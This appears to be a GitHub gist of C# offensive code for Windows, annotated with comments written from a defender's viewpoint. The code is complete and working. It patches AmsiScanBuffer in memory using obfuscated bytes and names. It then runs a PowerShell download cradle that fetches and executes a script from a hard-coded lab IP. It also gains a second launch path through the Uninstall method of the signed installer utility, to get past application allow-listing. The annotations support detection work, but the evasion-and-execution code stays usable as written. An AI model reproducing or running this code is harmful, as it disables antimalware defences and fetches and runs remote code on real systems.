@mariolima
Created August 22, 2022 19:26
// Undetected CLM Bypass with obfuscated AMSI patch
using System;
using System.Management.Automation;
using System.Text;
using System.Runtime.InteropServices;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
namespace Bypass {
class Program {
    // Reviewer annotations, written from a defender's reading of the sample. The code is
    // untouched; the comments mark which behaviours are observable (and so detectable) and
    // which are purely cosmetic string/byte encoding aimed at static signatures.

    // kernel32 imports. Individually these are benign and ubiquitous; the tell is the
    // ordered sequence LoadLibrary -> GetProcAddress -> VirtualProtect -> Marshal.Copy ->
    // VirtualProtect against a single address inside foo() below, which is characteristic
    // of an in-process export patch rather than ordinary interop.
    [DllImport("kernel32")]
    static extern IntPtr GetProcAddress(
        IntPtr hModule,
        string procName);
    [DllImport("kernel32")]
    static extern IntPtr LoadLibrary(
        string name);
    [DllImport("kernel32")]
    static extern bool VirtualProtect(
        IntPtr lpAddress,
        UIntPtr dwSize,
        uint flNewProtect,
        out uint lpflOldProtect);

    // Direct-execution entry point: nothing but a call into foo(). The installer class in
    // this file gives the same routine a second entry that does not pass through Main.
    static void Main(string[] args) {
        foo();
    }

    // Patches the AMSI scan export in the current process, then runs a download cradle in
    // an in-process PowerShell runspace. Public and static so the installer class can call it.
    public static void foo() {
        // Module and export names are kept base64-encoded and decoded at run time. This
        // defeats only literal-string signatures: a base64-aware string scan, or any sandbox
        // that logs LoadLibrary/GetProcAddress arguments, sees the plaintext names.
        byte[] data = Convert.FromBase64String("YW1zaS5kbGw=");
        string am = Encoding.UTF8.GetString(data);
        var lib = LoadLibrary(am);          // IntPtr.Zero when the module is absent; not checked here
        data = Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=");
        am = Encoding.UTF8.GetString(data);
        var asb = GetProcAddress(lib, am);  // the address overwritten below
        // The patch bytes are stored off-by-one and decremented just before use, so the real
        // six-byte stub never appears in the on-disk image. For detection the content of the
        // stub matters less than the fact that the first bytes of the resolved export no
        // longer match the module's on-disk image (or a known-good copy); an integrity
        // comparison of that prologue is unaffected by how the source bytes were encoded.
        var patch = new byte[] { 0xB9, 0x58, 0x01, 0x08, 0x81, 0xC4 };
        for(int i = 0; i < patch.Length; i++) {
            patch[i] = (byte)(((uint)patch[i] - 1));
        }
        // 0x40 is PAGE_EXECUTE_READWRITE. The page is writable only for the duration of the
        // copy and is then restored to its previous protection, so a scanner that enumerates
        // RWX regions will rarely catch this in the act; the VirtualProtect call targeting an
        // address inside a loaded DLL's export is the durable telemetry signal. Both return
        // values are discarded, so a refused protection change goes unnoticed by the code.
        _ = VirtualProtect(asb, (UIntPtr)patch.Length, 0x40, out uint oldProtect);
        Marshal.Copy(patch, 0, asb, patch.Length);
        _ = VirtualProtect(asb, (UIntPtr)patch.Length, oldProtect, out uint _);
        // Second stage: a plain, unencoded download cradle over cleartext HTTP to a
        // hard-coded private-range address (a lab IoC). This is the easiest static indicator
        // in the file. The fetched script is not part of this page.
        String cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.85/foos.ps1')";
        // PowerShell is hosted in this process through System.Management.Automation rather
        // than through powershell.exe, so process-creation rules keyed on the PowerShell
        // executable do not fire; the signal is a non-PowerShell process loading the
        // automation assembly. Presumably the "CLM bypass" in the file header refers to this
        // hosting arrangement together with the installer entry point below - nothing on
        // this page sets a language mode explicitly, so whether policy is actually relaxed
        // is unverified here.
        Runspace rs = RunspaceFactory.CreateRunspace();
        rs.Open();
        PowerShell ps = PowerShell.Create();
        ps.Runspace = rs;
        ps.AddScript(cmd);
        ps.Invoke();    // output and errors are discarded; the PowerShell instance is never disposed
        rs.Close();
    }
}
// Installer-uninstall execution vector (the signed framework installer utility used as a
// proxy, MITRE ATT&CK T1218.004). RunInstaller(true) makes the installer tool instantiate
// this class; because the work is placed in Uninstall rather than Install, the tool's
// uninstall path runs foo() under the tool's own signed (and typically allow-listed)
// image. Detection: the installer utility started with its uninstall switch against an
// assembly outside any deployment context, and that process then loading
// System.Management.Automation.
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer {
    // savedState is passed straight through to the base class; nothing in this class
    // reads it, and no Install override on this page ever writes to it.
    public override void Uninstall(System.Collections.IDictionary savedState) {
        base.Uninstall(savedState);
        Program.foo();
    }
}
}